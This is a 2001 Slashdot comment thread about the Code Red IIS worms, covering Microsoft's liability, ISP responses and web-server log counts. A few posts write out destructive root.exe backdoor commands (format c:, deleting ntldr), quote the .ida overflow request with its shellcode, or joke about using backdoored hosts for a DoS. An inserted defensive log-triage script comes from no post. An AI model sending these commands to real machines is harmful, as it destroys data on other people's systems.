    3. Re:It's not like they haven't announced the patch by rebelcool · · Score: 2
      Hm, well to design such a system as those you would need to know how to design a really good real-time system. And if you know how to do that, you're not a 'stoopid mcse'.

      Kinda like asking my mom to design a car engine...

      --

      -

    4. Re:It's not like they haven't announced the patch by ClosedSource · · Score: 1

      As been noted elsewhere, Win2K does NOT install a web server by default.

    5. Re:It's not like they haven't announced the patch by WankersRevenge · · Score: 1

      So in a nutshell, you are blaming consumers for the corporation's mistakes? I agree that admins should take some responsibility in rectifying the situation, but companies such as Microsoft should be held accountable for producing shoddy products in the first place. And let's face it, not everyone is super connected and knows about this. It's Microsoft's responsibility to do everything they can to notify Win 2000 customers and solve this problem. It's their design flaw, not the admins'. So they need to fix it. The end.

    6. Re:It's not like they haven't announced the patch by drc500free · · Score: 1

      But if someone's system got screwed around because of the backdoor, they could definitely sue Microsoft, just like people who were in accidents sued Firestone.
      Granted, with the M$ defense team they probably couldn't win, but it's not like it would be thrown out of court...

    7. Re:It's not like they haven't announced the patch by TheMidget · · Score: 1
      > There's also the subtle difference that flaws in Microsoft products don't kill people.

      Not yet.

      What if some stoopid MCSE gets the idea of designing a medical life-support system around an NT PC? Or uses a Win2000 PC to command door opening/closing in a prison? Or uses NT to steer a ship? Or uses SQL Server to manage a nuclear power plant? In all those situations, failure can potentially have deadly consequences. Sure, in peace time the ship just gets towed to port, but imagine a failure happening during combat? I know, Microsoft specifically disclaims any warranties for such uses, but has that stopped anybody?

    8. Re:It's not like they haven't announced the patch by Syberghost · · Score: 2

      There's also the subtle difference that flaws in Microsoft products don't kill people.

      Don't be so sure; there are Microsoft products in use on the space shuttle, the space station, and Navy warships.

      Even if they're just pushing data around, bad data in those environments can result in death.

  240. In 2001Ad war was beginning. by Anonymous Coward · · Score: 0
    Chief: What happened?
    Admin: Someone set up us the bomb!
    Admin: We get signal
    Chief: What?
    Admin: Main screen turn on!
    Chief: It's you!
    Code Red: How are you gentlemen!
    All your base are belong to us!
  241. hey taco! by Anonymous Coward · · Score: 0

    i overflowed your mom's buffer last night. she seemed to like it.

  242. Re:Code Red IV by Ether+Trogg · · Score: 1
    It's only a matter of time before CR4 hits, monopolizing off of CR2's success

    Yeah, but at least then the Justice Department can file an antitrust lawsuit against the virus.

    --
    "The dead do not shoo-bop-aloo-bah." -- Kai, 'Lexx'
  243. Microsoft feature? by sjonke · · Score: 2, Interesting

    Noticing code red scanning my OS X Mac, I contacted the owner of the offending machine (actually the net admin on which the machine resided) and found out that the user of the computer (a portable) did not even know that he was running IIS.

    --
    --- What?
    1. Re:Microsoft feature? by EastCoastSurfer · · Score: 1

      If you do a default installation of Win2k Pro it does not install the World Wide Web Publishing Service (at least in my experience). The Win2k Server will install it by default.

  244. Re:Microsoft should be sued by NoBeardPete · · Score: 1

    The important difference is this - gun manufacturers typically make a product that works as advertised, and if anyone gets hurt it's because the owner (or someone else who got their hands on the gun) used the gun in its intended manner. At this point, the gun behaved exactly as advertised, but was maliciously used to harm someone.

    Microsoft's current position is closer to that of a car manufacturer that sells cars that explode when you expose them to a shock wave (as might be caused, say, by a car exploding in the next lane). You can use the car exactly the way you are supposed to, following all of the instructions in the users manual, but if you didn't notice the little publicized document from the manufacturer mentioning the problem and describing how to fix it, you still get exploded.

    When car manufacturers do this, they are expected to 1) aggressively try to contact any and all customers who might have their faulty product, 2) very likely perform a recall of said faulty product, and 3) still get their asses sued off anyway.

    I think that's more the pertinent liability model.

    --
    Arrr, it be the infamous pirate, No Beard Pete!
  245. horrible thought by hex1848 · · Score: 1

    *if anyone's been under a rock the last month and still hasn't patched, here is a good reason to* looking at our webservers log files we have 1000's of IP addresses to infected machines with the root.exe back door. I'm not going to post any code but it would be trivial to loop through the log file, grab the infected IP addresses, and send out a bunch of :80 requests: /scripts/root.exe?/c%20format%20c:

  246. There should be a total recall! by 2Bits · · Score: 1
    When a car manufacturer screws up a specific model of car, there's a recall (e.g. Ford Explorer). When a drug manufacturer screws up a specific batch, there's a recall (e.g Bayer). When a medical equipment manufacturer screws up, there's a recall (e.g. asthma spray). When a toy manufacturer screws up, there's a recall (e.g. recent example, anyone?)

    The software manufacturers should be required to recall their faulty products, and the consumers should get refund, or get a new not-faulty products (until new problems are discovered, that is).

    And we should see a massive improvement in MS software, if they want to survive. I can't imagine they can survive if they have to recall every single product! I guess Bill Gates might as well declare MS bankrupt, instead of losing everything.

    1. Re:There should be a total recall! by datarat · · Score: 1

      When a car manufacturer does a recall, they fix the vehicle in the cheapest manner possible that will correct the problem. But the consumer STILL has to bring the vehicle in. Where's the difference with applying a free patch?

      I think you're letting your anti-microsoft zealousness cloud your thinking.

      Blaming the producer is irresponsible. Mistakes get made and you fix them as fast as possible. If the fix is available, and it's unused, then who exactly is at fault?

      --
      If you do something right, people won't be sure you've done anything at all.
  247. Mozilla is the cure by b1t+r0t · · Score: 1, Offtopic
    Download the latest Mozilla and read the version notes for 0.9.2 to see how to fix your setup file to kill pop-up ads. I've been pop-under free for a couple of months now.

    As usual, the cure is to ditch the SmallLimp crapware and replace it with mature open source code.

    --

    --
    "Open source is good." - Steve Jobs
    "Open source is evil." - Microsoft
    1. Re:Mozilla is the cure by Anonymous Coward · · Score: 0

      or maybe he could stop trying to find the elusive free pr0n.

  248. Code Red IV? by the_tsi · · Score: 1

    Maybe us open source folk should write a new Code Red version that uses the same exploit and installs a service pack after it gets in, and then erases all the nasty things out of the scripts directories that the other code reds put there...

    ...then it automatically sends the maintainer a bill for our services.

    -Chris

    1. Re:Code Red IV? by radja · · Score: 2

      what do you think we are..? german lawyers?

      //rdj

      --

      No one can understand the truth until he drinks of coffee's frothy goodness.
      --Sheikh Abd-Al-Kadir, 1587
  249. IPs by spinfire · · Score: 1
    I have received many hits, from DSL users on my local subnet unaware they are even running a server to a Bank's website. With the news that hotmail's own servers were compromised I think it becomes necessary to view this worm with a careful eye.

    I even got repeated hits from the "Bank of Taccoa"'s website, meaning the bank was not aware their servers were being hit. Needless to say, I didn't try the backdoor out on that IP...

    Here is a complete list to date

    1. Re:IPs by Fez · · Score: 1

      The funniest one I've seen so far (or maybe the saddest) is a law firm "Alleguez and Lieb Attorenys at Law" (finding the infected machine is left as an exercise for the reader)

      As a rule I don't try exploiting back, even more so against a law firm. Makes one wonder what would happen if they were actively compromised though. I'm sure someone would end up sued.

  250. Hey at least you can get web traffic by Diesel+Dave · · Score: 1

    My connection is AT&T broadband and my asshole hurts. No mas ATT! No mas!

  251. code red by UncleBoy · · Score: 1

    all the requests to port 80 on my router log are from @home
    i wonder who is doing more to slow down the net

  252. So doesn't that mean Microsoft was lying? by Myself · · Score: 2

    When Microsoft said that customer data wasn't exposed during the Hotmail infection, wouldn't that seem to contradict what we know about the worm?

  253. Geee.... by isorox · · Score: 1

    just grepped my log and spotted this

    195.146.151.70 - - [05/Aug/2001:19:44:17 +0100] "GET /default.ida?GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG%uab30%u2ac5%ucbd3%u34a4%uab30%u2ac5%ucbd3%u34a4%uab30%u2ac5%ucbd3%u34a4%uab30%uab30%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00a2%u0000%u00=a HTTP/1.0" 404 279 "-" "-"

    I'm guessing this is it..

    1. Re:Geee.... by dermotfitz · · Score: 1

      personally I think you are a liar.

      --

      How perfectly goddamn delightful it all is, to be sure. - Charles Crumb
    2. Re:Geee.... by isorox · · Score: 1

      I'm sure you do - it's there. Date's a bit old, which makes me think it's not a real worm, but someone playing around - after more investigation (reading the log, not just grepping for default.ida), it looks like someone was playing around.

      195.146.151.70 - - [05/Aug/2001:19:43:46 +0100] "GET /~iso/ HTTP/1.1" 200 1326 "-" "Links (0.96; Unix)"
      195.146.151.70 - - [05/Aug/2001:19:43:53 +0100] "GET /~iso/ HTTP/1.1" 200 1326 "-" "Links (0.96; Unix)"
      195.146.151.70 - - [05/Aug/2001:19:44:17 +0100] "GET /default.ida?GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG%uab30%u2ac5%ucbd3%u34a4%uab30%u2ac5%ucbd3%u34a4%uab30%u2ac5%ucbd3%u34a4%uab30%uab30%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00a2%u0000%u00=a HTTP/1.0" 404 279 "-" "-"

    3. Re:Geee.... by dermotfitz · · Score: 1

      ok I believe you.
      didn't mean to be mean.
      :)

      --

      How perfectly goddamn delightful it all is, to be sure. - Charles Crumb
  254. Can the internet community sue microsoft? by Anonymous Coward · · Score: 0

    Considering it's a typical M$ security flaw causing degradation of the web, some businesses might be able to put a $ figure on the cost this has had to their business. So can Microsoft be sued? I would love to see a class action against that monopoly...

    1. Re:Can the internet community sue microsoft? by optikSmoke · · Score: 1

      IANAL, but don't you technically pay for the licence to use the software, not necessarily the software itself? Therefore use of the software is restricted by the EULA because that's what you paid for, and you don't own the software. On the other hand, like you said, you don't get to see the EULA before purchase............

    2. Re:Can the internet community sue microsoft? by BattyMan · · Score: 1

      OK what if you made the liability limit the purchase price of the software?

      That would completely save the FSF/OSS developers, but the Empire, who's grown _very_ rich by selling shoddy crap, might lose some money.

      And I don't think it's totally unreasonable for a software customer to have _some_ assurance that the product he's paying hard ca$h for might just actually work. In most industries, this is called a warranty, but the software industry seems somehow magically immune to consumers' expectation of this, as well as the general expectation of a product's basic safety. People won't buy a coffeepot without a warranty, what's so special about computer software?

      I swear, I've yet to buy a commercial software program that actually _worked_! They're crap! The publishers of that shit need to be held to _some_ standard of "merchantability" or _something_!

      Perhaps something along the lines of: "We've made every reasonable effort to assure that our software is bug and problem free, and performs essentially as described in the instruction manuals. Unfortunately, we can't control the effects that _other_ software in your computer may have on ours, and while our support staff will make reasonable efforts to help you run our software, proper operation may not be possible in all circumstances. In this case, you should return the software, including all original media and materials, with a notarized affidavit to the effect that you have been unable to use it and retain no copies, to our customer service department along with a copy of your receipt. A refund will be sent to you for your purchase price, along with an apology for your inconvenience. We value your business and hope we will be able to solve your difficulty in our next product release."

      Contrast that with the gist of the M$ EULA: "This software isn't warranted to do a damn thing. Don't come running to us if it doesn't work, all risk is on you. If it doesn't happen, you're screwed. We don't care. We don't have to."

      The M$ EULA pisses me purple every time I see it. What a crock of shit!

      And yet you agree to it when you _buy_ your computer! (I'm in the market for a laptop). It applies to software which you have no choice but to buy!

      OSS is a different issue, because the developer has no control over what someone might do with his code, and what the consequences of that might be, but a monolithic, binary-only, shrink-wrapped (or preinstalled on the machine!) totally controlled-by-the-publisher black-box software package over which the _user_ has little to no control shouldn't be entirely the user's responsibility to understand and maintain.

      This was always my problem with M$. There was too much that had to be done to their code to make it useful, and too little information or latitude given to the luser to allow him to fix it himself.

      Imagine how messed up it would be if I could sue because I designed my real-time aircraft control system around the Linux 1.0 kernel and BIND?

      If you design a real-time aircraft control system around Linux 1.0 and BIND, you should maybe _be_ sued - by the estates of the people killed in the crash!

      --
      Exceeding the recommended torque is not recommended.
    3. Re:Can the internet community sue microsoft? by BattyMan · · Score: 1

      Yeah, the EULA totally bends the customer over.
      See goatse.cx for a graphic analysis. (but be advised that there's an obscenity warning out on that site!)(If only M$ would give you a similar obscenity warning before you read their EULA!)

      But is it actually enforceable?

      When I tell M$ cu$tomers about various provisions in the EULA in an attempt to explain to them how badly they're being screwed, the usual reaction is complete disbelief that anything so ridiculous could ever be enforced in a court.

      Isn't it time somebody _tested_ this horseshit to see? Infineon had the glands to take RamBus to court, after other manufacturers caved and settled, and look what happened to RamBus! What if someone sued M$ for some major damages and a jury said: "Yes, if your software makes the customer's computer catch fire, burning down his house and killing his bedridden mother, M$ _has_ some liability in the matter!"?

      --
      Exceeding the recommended torque is not recommended.
    4. Re:Can the internet community sue microsoft? by mini+me · · Score: 1

      Well since I don't run W2K on the server, I didn't read the EULA. Since I haven't read it, I haven't agreed to it!

      This Code Red worm still used my resources however. The processing power it took to process the request, the bandwidth wasted on the request. Am I not entitled to a lawsuit against Microsoft? Here is the chance for all non-Windows web host owners to join together in one massive lawsuit against the Evil Empire

    5. Re:Can the internet community sue microsoft? by darkPHi3er · · Score: 1, Insightful

      Read the MS EULA (End User License Agreement)

      for example, if you load MS/NT/W2K on a PC that controls your company's fire alarms and because of a virus/worm/???? your fire alarms are down when a fire starts and burns your business to the ground (including physical injury to staff)....

      MS is NOT liable for one red cent of any kind of damages....

      MS was certainly not the first S/W company to immunize themselves from product liability through licensing....

      BUT, the MS license agreement is one way non-negotiable (Take it or Don't Load It), not subject (by the user) to any modification under any circumstances (if a consultant GUARANTEES anything about Windows performance that's not binding on MS) and best of all....

      the mere fact that you install the s/w is COMPLETELY BINDING ON YOU AND ALL YOUR COWORKERS...

      SO, if over your loud objections, your IS/IT dept installs W2K in your department and it crashes another app (say an Oracle8 database on Solaris) and destroys it completely, well, the mere act of installation binds you completely, even if you didn't want it, didn't need it and told everyone that it would ruin your existing applications...

      NOW THAT'S ***INNOVATION***

      --
      Ten quid, she's so easy to blind. And not a word is spoken...
    6. Re:Can the internet community sue microsoft? by justdewittall · · Score: 1

      >But the *nature of the internet* is such that once a box is connected, ALL traffic is authorized to at least connect to the machine, and from there is limited only by you and your software.
      ----------
      So Al Gore is responsible?
      No, Really.
      You don't forgo any rights by connecting to the Internet. Sure, you're only asking for trouble if you are not aware of the dangers of running Win2k/IIS. But the precedent is certainly there to sue. Somebody had to make McDonald's label coffee "WARNING: HOT"
      Or if they knew about releasing the product without proper security, why is it not any different than putting out a car with perforated seat belts?

      --
      ummmmmmmmmmmm.....
  255. Re:Microsoft should be sued by pointym5 · · Score: 1
    Either way, he took deliberate action to make his PC a server, and with it, took on the responsibility of keeping that server up-to-date.

    Or else his PC vendor sold him the thing pre-configured with Win2K Server. That doesn't seem unlikely to me at all. And in any case, an OS installation that includes turning on a web server by default seems stupid.

  256. Some numbers and a comment by ebrandsberg · · Score: 1, Informative

    For people that don't run a webserver, here is what I'm getting out of this command (note that my log is probably a LOT less massive than others because I'm in a relatively NT free IP block, with mostly Linux servers):

    grep "Aug.*ida" httpd.log | cut -f4,7 -d' ' | cut -c2-7,22-40 | sort -n | uniq -c
    23 01/Aug /default.ida?NNNNN
    26 02/Aug /default.ida?NNNNN
    21 03/Aug /default.ida?NNNNN
    24 04/Aug /default.ida?NNNNN
    4 04/Aug /default.ida?XXXXX
    14 05/Aug /default.ida?NNNNN
    13 05/Aug /default.ida?XXXXX
    1 05/Aug /x.ida?AAAAAAAAAAA
    9 06/Aug /default.ida?NNNNN
    34 06/Aug /default.ida?XXXXX
    9 07/Aug /default.ida?NNNNN
    38 07/Aug /default.ida?XXXXX
    2 08/Aug /default.ida?NNNNN
    29 08/Aug /default.ida?XXXXX
    3 09/Aug /default.ida?NNNNN
    44 09/Aug /default.ida?XXXXX
    2 10/Aug /default.ida?NNNNN
    29 10/Aug /default.ida?XXXXX

    This was run at 11:45 PST, meaning today may be even worse for the XXX version than yesterday, probably about 60 attempts before the end of the day. There was a discussion about a code red removal worm, which given how long this thing has been attacking, and the results, is probably the ONLY way this thing is going to be removed. Why isn't the US Government issuing such a worm to protect national interests? It could operate by infecting only machines that attempt to infect the local machine, thus not probing any non-infected machines itself; if you aren't infected, it won't touch you, if you are, it will. Seems simple enough to me. At the rate of propagation this thing works at, it would quickly decimate most if not all infections very quickly.
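
    The log triage that hex1848 (post 245) and ebrandsberg (post 256) describe, as an added example that is not code from any post in this thread and not the worm's own code: parse Apache combined-log lines, label each .ida probe by its filler byte (the 'N' run of the original worm, the 'X' run of the later variant, anything else such as the hand-made 'G' probe quoted above), note whether a %u-encoded payload follows, pick out requests for the root.exe backdoor, and produce per-day counts in the style of uniq -c plus the list of probing source addresses to hand to the owning network's abuse contact rather than exploit back. The sample log lines are constructed (RFC 5737 test addresses, placeholder %u bytes rather than real shellcode); the label names, the 100-byte minimum filler length and the root.exe match are this example's own choices.

```python
"""Classify Code Red style probes in an Apache combined access log.

Added example for this thread, not code from any post. The sample log lines
are constructed (RFC 5737 test addresses) and the %u payload is a placeholder.
"""
import re
from collections import Counter

# Apache combined log: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<day>\d{2}/[A-Za-z]{3})/\d{4}:[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)

# The .ida overflow request quoted in this thread: an .ida name, then a long run of one
# filler byte, then %u-encoded shellcode. Require at least 100 repeats (an assumption of
# this example) so ordinary short query strings do not match.
IDA_RE = re.compile(r'^/[^/?]+\.ida\?(?P<filler>[A-Za-z])(?P=filler){99,}(?P<tail>.*)$')

# Requests for the root.exe backdoor, e.g. /scripts/root.exe?/c+dir. Seeing these in
# your own log means the requester is scanning for already-infected hosts.
BACKDOOR_RE = re.compile(r'/root\.exe(?:\?|$)', re.IGNORECASE)


def classify(path):
    """Return a label for a request path, or None for ordinary traffic."""
    m = IDA_RE.match(path)
    if m:
        label = 'ida-' + m.group('filler')       # ida-N, ida-X, ida-G, ...
        if '%u' in m.group('tail'):
            label += '+shellcode'                # %u-encoded bytes follow the filler
        return label
    if BACKDOOR_RE.search(path):
        return 'root.exe-backdoor'
    return None


def summarize(log_text):
    """Return (per-day label counts, per-source-IP probe counts, number of unparsed lines)."""
    per_day = Counter()
    per_ip = Counter()
    unparsed = 0
    for line in log_text.splitlines():
        if not line.strip():
            continue
        m = LOG_RE.match(line)
        if not m:
            unparsed += 1                        # keep going; do not trust the log to be clean
            continue
        label = classify(m.group('path'))
        if label is None:
            continue
        per_day[(m.group('day'), label)] += 1
        per_ip[m.group('ip')] += 1
    return per_day, per_ip, unparsed


def probe_sources(log_text):
    """Sorted source IPs that sent any .ida or root.exe probe: the list for an abuse report."""
    _, per_ip, _ = summarize(log_text)
    return sorted(per_ip)


def report(log_text):
    """Text report in the shape of 'sort | uniq -c': count, day, label."""
    per_day, per_ip, unparsed = summarize(log_text)
    lines = ['%6d %s %s' % (n, day, label) for (day, label), n in sorted(per_day.items())]
    lines.append('%d probing hosts, %d unparsed lines' % (len(per_ip), unparsed))
    return '\n'.join(lines)


# Constructed sample log (not real traffic). Filler runs are 224 bytes, the length of the
# probes quoted in this thread; the %u bytes are placeholders, not the worm's payload.
_PAYLOAD = '%u1234%u5678%u00=a'
SAMPLE_LOG = '\n'.join([
    '10.0.0.5 - - [06/Aug/2001:02:14:07 -0700] "GET /default.ida?%s%s HTTP/1.0" 404 279 "-" "-"' % ('N' * 224, _PAYLOAD),
    '10.0.0.5 - - [07/Aug/2001:02:14:07 -0700] "GET /default.ida?%s%s HTTP/1.0" 404 279 "-" "-"' % ('N' * 224, _PAYLOAD),
    '192.0.2.77 - - [07/Aug/2001:11:03:55 -0700] "GET /default.ida?%s%s HTTP/1.0" 404 279 "-" "-"' % ('X' * 224, _PAYLOAD),
    '198.51.100.9 - - [05/Aug/2001:19:44:17 +0100] "GET /default.ida?%s%s HTTP/1.0" 404 279 "-" "-"' % ('G' * 224, _PAYLOAD),
    '192.0.2.77 - - [08/Aug/2001:11:04:02 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 291 "-" "-"',
    '203.0.113.4 - - [08/Aug/2001:12:00:00 -0700] "GET /index.html HTTP/1.1" 200 1326 "-" "Links (0.96; Unix)"',
    'garbage line that is not in combined log format',
])

if __name__ == '__main__':
    print(report(SAMPLE_LOG))
    print('abuse report list:', ', '.join(probe_sources(SAMPLE_LOG)))
```

    Run it against a real log with `report(open('httpd.log').read())`. Counting per (day, label) rather than per filler column keeps the N and X variants apart the way ebrandsberg's cut -c22-40 does, and the separate root.exe label shows whether anyone is already hunting for backdoored hosts on your network, which is the case hex1848 warns about.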

  257. Re:K5 contest by matguy · · Score: 1

    I would imagine that one could at least make it pop up a warning on the screen prompting the user of the needed patch (complete with direct link) and sound the pc-speaker which could alert anyone nearby. (someone walking by hearing a beep-beep would probably at least turn on the screen.) Something like that should at least help.

    --

    matguy(.com)
  258. Tested, working... Effective. by Anonymous Coward · · Score: 1, Interesting
    /root.exe?/c+del+/a+srh+/q+/f+c:\ntldr.*

    Bye bye boot process...

  259. Re:make some money off banner ads by TheMidget · · Score: 3, Informative
    > host banner ads on your server with the file name of /default.ida.

    Won't work. The worm won't follow redirects nor download any pictures (banners) from the page.

  260. Re:I saw that Reuters story earlier by Shane+Hathaway · · Score: 1

    Your logs (in your sig) indicate that almost all attacks are coming from hosts with numeric host names. Probably home users. Most likely they'll never know they are contributing to the problem.

    Realistically, the only way to reach those people is through public channels (TV announcement, perhaps) and anti-worms.

  261. Re:Bah. by Delphis · · Score: 1

    I've seen 700 or so on our sites here.. (a mix of the first and second ones, judging by the differing urls). On my own personal machine there's another 350 or so.. Stupid really, considering none of the sites are 'high profile' .. it all just comes down to network address ranges I think. The networks are just scanned and each IP attacked aren't they?

    --
    Delphis
  262. Cisco Routers by vulg4r_m0nk · · Score: 1

    for anyone w/ Cisco 600 series routers, blocking port 80 is the only fix for the problem of the routers hanging.

    It took some time for my ISP to figure this out. They spent two weeks saying that web access just had to be denied, but that's insufficient.

    And by the way, the fact that Verizon called is downright heartwarming ;) -- Qwest flat refuses to accept inquiries!

    1. Re:Cisco Routers by Anonymous Coward · · Score: 0

      I was called by Qwest last night to inform me of CR and the problems with cisco 6xx routers, and where to find info on how to fix it. According to the phone drone they were getting 50,000 calls a day.

  263. Mutations? by vinnythenose · · Score: 1

    I love how in the news they talk about the latest "mutations" and such of code red. People haven't quite caught on that the virus does not modify itself the same way a "real world" virus can. Someone else is simply re-writing it differently. Now, unless something extraordinary has happened while I was asleep and virii can in fact modify themselves to attack in different ways, each different than the one before, then spray me red and call me a monkey's lost uncle.

    --
    --- I used to moderate, then I read the -1 articles and decided having to filter through them was not worth it.
  264. What to do... by Anonymous Coward · · Score: 0

    Write a script named index.ida that when called will automatically use Samba to send an SMB message to the server that scanned you. The message sent should contain something like:

    PATCH YOUR DAMN SYSTEM!

  265. Warning: Virus Alert! by WillSeattle · · Score: 1

    Warning, you may have the Code Red virus on your machine! If you get an email or read a post with the subject line of "Warning: Virus Alert!" it has already infected your machine.

    For the fix, follow this link and execute the code you find to fix your system.

    --
    --- Will in Seattle - What are you doing to fight the War?
  266. Re:Morality of Counter Measures? by FakePlasticDubya · · Score: 1

    I wasn't aware of a cmd line command to shut down a machine... is there one? There is a command to shut down IIS I believe.

    --

    "We shall show mercy, but we shall not ask for it" -- Winston Churchill
  267. Code Red is trying to eat me! by sgt_getraer · · Score: 2, Informative

    So I get a call from my ISP Verizon yesterday. They ask me if I have been having problems with the Code Red virus.

    "Nope, but my service is shot to hell. You guys must be having some serious problems."

    The representative goes on to tell me that I can 'fix' the code red virus by unplugging my router and plugging it back in. I try, vainly, to inform him that the virus is doing nothing to my hardware and the reason I'm having problems is that it's making swiss cheese of the SERVERS...

    Anyway, the guy finishes his script and hangs up. So is Verizon trying to cover up their ineptness by implying that the customer is infected, and not them? Proactivly trying to shift the blame to get less tech support call? Very strange indeed...

    1. Re:Code Red is trying to eat me! by garcia · · Score: 3, Insightful

      They probably understand the fact that there is VERY little that they can do (other than blocking port 80) than inform their users of what to do. At least they are giving "Worm? I have a worm in my computer? There's no dirt in there" guys the information.

      As much as I hate Verizon and their bullshit, at least they are trying to do something.

      Gotta give em SOME credit ;)

    2. Re:Code Red is trying to eat me! by BeBoxer · · Score: 2

      Code Red will crash some Cisco 675 DSL routers. That's probably why they are calling.

    3. Re:Code Red is trying to eat me! by b1t+r0t · · Score: 2

      If your router is a Cisco and hasn't had a firmware upgrade in the past six months or so, it may have a crashing bug that can be triggered by Code Red's exploit. But if you have _any_ service, this is not the problem, and the guy who called you was a total idiot.

      --

      --
      "Open source is good." - Steve Jobs
      "Open source is evil." - Microsoft
    4. Re:Code Red is trying to eat me! by Anonymous Coward · · Score: 0

      Patching the CISCO 675/678 to CBOS 2.4.1 does not fix the problem even though the CISCO web site says that it will. Even power cycling the CISCO only fixes the connection until the next port scan blows its mind again. You have to console in, disable web access and change the web port like this:

        telnet IP_ADDRESS(CISCO675)
        password ******
        enable
        set web disabled
        set web port 8080
        write
        reboot

      At first I tried just disabling the web but every time the Cisco 675 got scanned by CR it would lock up. But changing the port number to something other than 80 fixed it, been going for 3 days without a problem now.

  268. Re:Bah. by spectral · · Score: 0

    Wow, that URL looks strangely familiar.. It's almost like I'd seen it somewhere before. Oh yea, in the article itself. Were you going for 'Informative', 'Insightful', 'Funny', or just 'Plain Fucking Stupid' ..

    I swear, we need a 'Karma Whore' moderation.

  269. Re:Bah. by isorox · · Score: 1

    Actually .jsp is a java page, tomcat plugin available for apache and a dedicated java servlet server is available for linux (and I guess windows)

    now, .asp is active server page, what you are thinking of.

  270. Re: 622 since 08/01/01 at 00:00 by ph8ts2l · · Score: 1

    Re: 622 since 08/01/01 at 00:00

  271. Re:Microsoft should be sued by norton_I · · Score: 2

    The difference between guns and windows is that guns do damage when working as designed. A gun is designed to destroy things you point it at, and that is what it does. It can be used legally or illegally, and manufacturers really can't do much about it.

    IIS is causing damage because of a design flaw. If you bought a gun and it blew up in your hand due to a design flaw, the manufacturer would certainly be at fault.

    I am not convinced that MS should be liable for this, I am just saying that your analogy is flawed, and that in the world of physical products, MS would be hit with a billion dollar lawsuit right now.

  272. Watch out AT&T! by CM39 · · Score: 1


    Well one use for all these machines if port 80 is back up before all those infected are fixed, would be for someone who knows how to exploit the backdoor code red II leaves behind, to use them to perform a DoS attack on AT&T.

    I hope I just gave someone with the knowledge to be able to do it a good idea :-)

    Just kidding....sort of

    --

    "PMS is the time of the month when women act like men do all the time"
    Robert Heinlein
  273. Re:Microsoft should be sued by javahacker · · Score: 1

    Correction, the version of IIS that is being used by Code Red to get control of machines doesn't run on Win9x or ME. Windows 98 at least offers the Personal Web Server, which is basically an earlier version of IIS.

    My Linux Mandrake V8.0 cautions me about possible security problems if I select servers (like web or ftp) and have them active when I install it. The Microsoft Windows installer does not warn me.

    Most of the non-administrators with IIS on their machines probably had no idea that they were creating a security problem by installing IIS. They probably don't have firewall software or hardware either. They don't know the net is a dangerous neighborhood, but Microsoft should.

    The IIS patch was not (last time I looked) available on Windows Update, which is the place most users would go to find it. Shouldn't it be there as an important security fix? This is a serious oversight by Microsoft. They distributed fixes for other security problems on Windows Update, but not for the most serious one to date.

  274. Re:ok you bigots :) by dermotfitz · · Score: 1

    I hope you weren't serious with that post.

    --

    How perfectly goddamn delightful it all is, to be sure. - Charles Crumb
  275. Re:I think you're on to something... by Fluid+Truth · · Score: 1
    I know that I'm a little late on this, but...

    If Bill Gates had a nickel for every time Windows crashed...
    ..oh wait, he does

    If you like that, you should go to http://www.stuff.halibut.com/ and buy the t-shirt that's similar.

    --
    Apparently, of the rich, by the rich, for the rich.
  276. huh .. when does the prequel come out ? by freaker_TuC · · Score: 2, Funny

    They should have started with version IV instead of I ...

    then they could do some prequels 10 years later ...

    codered IV: A new hope
    codered V: The code strikes back
    codered VI: Return of the code

    ...

    codered I: The iis menace.

    --
    --- I am known for the ones who want to find me on the net. Is that a privacy risk or a privilege? One might wonder..
  277. Re:Oddly enough... by starseeker · · Score: 2

    That's because car safety has emotional and financial strings attached. You don't see people getting truly upset about computers unless it is either costing them money in a way they can understand easily, or kids are getting into trouble. The issue of poor software design isn't one people can readily understand, just as a physical intruder is easier to understand than an electronic one.

    --
    "I object to doing things that computers can do." -- Olin Shivers, lispers.org
  278. Version 3? Don't think so. by Todd+Knarr · · Score: 5, Insightful

    My suspicion is this is Code Red 2. One of the AV companies used "CodeRed.v3" or something similar to refer to Code Red 2, and I'd bet the journalists were just too clueless to figure out that the two names refer to the same thing.

    1. Re:Version 3? Don't think so. by grytpype · · Score: 2, Funny

      Oh, so that's why Slashdot sucks so much. Thanks for the info.

      --

      - Have a picture

    2. Re:Version 3? Don't think so. by EvlG · · Score: 2

      Read the /. FAQ. Taco speaks directly to your concern about verifying stories.

      Essentially, it is something like Taco sees /. as different from other media, in that readers verify and expound on the stories. /. merely reports the story, with some sanity checking (like not reporting something without even a link). What happens after that is up to the readers.

  279. Sofware Insurance by Midnight+Thunder · · Score: 1

    Companies should instead be taking out insurances against possible errors in an application. If they wish to claim then they have to prove that a) they provided the required safe guards to avoid exploitation and b) had in place a good back-up plan in case something did go wrong.

    If I was a that dependent on some other technology, such as trucks for goods transportation, then I would ensure that there was a back-up plan in place in case the truck broke down - maybe a second truck, a reliable mechanic, or both.

    Of course if this is John Doe with an illegal copy of IIS, then they probably are not going to take the time to protect themselves. For the paranoid: maybe this is MS spreading the virus to find out where the illegal copies of IIS are? If that is the case then we should call it CodeRed-XP ;)

    --
    Jumpstart the tartan drive.
  280. Re:And more will come... by Anonymous Coward · · Score: 0
    they clicked "YES" at some point in an installation without really understanding what they were saying YES to.

    Oh, you mean like at the EULA?

